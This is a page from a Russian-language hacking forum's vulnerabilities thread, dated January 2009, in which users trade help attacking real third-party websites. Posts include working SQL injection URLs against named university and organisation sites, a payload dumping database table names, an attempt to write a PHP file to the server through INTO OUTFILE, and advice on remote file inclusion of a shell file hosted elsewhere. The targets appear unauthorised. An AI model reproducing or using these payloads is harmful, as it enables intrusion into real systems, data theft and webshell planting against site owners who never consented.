ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
Страница 522 из 1393 « Первая < 22422472512 518 519 520 521 522 523 524 525 526 5325726221022 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #5211  
Старый 31.01.2009, 18:03
PaCo
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802

Репутация: 380
По умолчанию
У меня такой вопрос, подобрал например в скуле количество выводимых полей, конструкция такого типа выводит данные -1+group+by+1, но как только делаю union даные не выводятся, вот сылка
Код HTML:
http://www2.cali.org/index.php?fuseaction=conference.ViewAgenda&eventid=-1+union+select+1,2,3,@@version,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*
Как я понял нужно делать через сабгверю?
 

  #5212  
Старый 31.01.2009, 18:25
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию
(10 символов)
Цитата:
http://www2.cali.org/index.php?fuseaction=conference.ViewAgenda&eventid =-1+union+select+1,group_concat(table_name),0x3a,0x3 a,1,1,1,1,1,1,1,1,1,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33+from+information_sch ema.tables/*
 

  #5213  
Старый 31.01.2009, 18:41
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию
Цитата:
Сообщение от Tigger  
file.php?a=http://site.ru/shell.txt. Желательно именно *.txt, потому что не всегда можно *.php заливать и не факт, что сработает, а так любой файл даже *.txt все-ровно принимается как *.php!
Как он принимается за пхп,если не обрабатывается интерпретатором,если ток не указано в httpd.conf его обрабатывать как пхп сценарий.Или ты имеешь ввиду,что можно залить любой тхт файл ?
 

  #5214  
Старый 31.01.2009, 19:07
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
Велемир ты разницу между заливкой и инклудом видишь?

При инклуде расширение не играет роли, любой файл можно включить и он обработается Tigger прав.
 

  #5215  
Старый 31.01.2009, 19:13
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию
Желательно именно *.txt, потому что не всегда можно *.php заливать
 

  #5216  
Старый 31.01.2009, 19:26
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
Видимо нет =\

http://php.su/functions/?include
http://php.su/functions/?require

Это не заливка, а ВКЛЮЧЕНИЕ
 

  #5217  
Старый 31.01.2009, 20:45
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию
Пытаюсь записать в файл так вот он все проводит норм а пройти запрос куда записать не хочет! Ошибка такого вида

Код:
MySQL error: 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'/tmp/aaa.php\'--' at line 1
Темно-оранжевый - мои ковычки
Серый - то что он не может прочитать

Пробывал и в хексе(0x и т.д.) не получаеться!
Мб кто знает?
 

  #5218  
Старый 31.01.2009, 20:51
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию
diznt, запрос в студию!
 

  #5219  
Старый 31.01.2009, 20:53
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию
http://mial.cs.sfu.ca/newsItem.php?id=-1+union+select+1,0x66726f6d205b2063617368205d20776 8697468206c6f7665202929292929,3,4,5,6,7,8+from+Use r+into+outfile+'/tmp/aaaa.php'--

То что в хексе там текст 'test!' так как чтобы проверить дейстивтельно ли записал он запрос
 

  #5220  
Старый 31.01.2009, 20:56
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
Цитата:
Сообщение от mailbrush  
diznt, запрос в студию!
А зачем он нужен, если и так видно, что ковычки экранируются.

diznt
Путь должен быть в ковычках, в хексе нельзя, в твоём случае залить не получится

add И там даже file_priv N помоему
Последний раз редактировалось jokester; 31.01.2009 в 21:01..
 
 
Страница 522 из 1393 « Первая < 22422472512 518 519 520 521 522 523 524 525 526 5325726221022 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ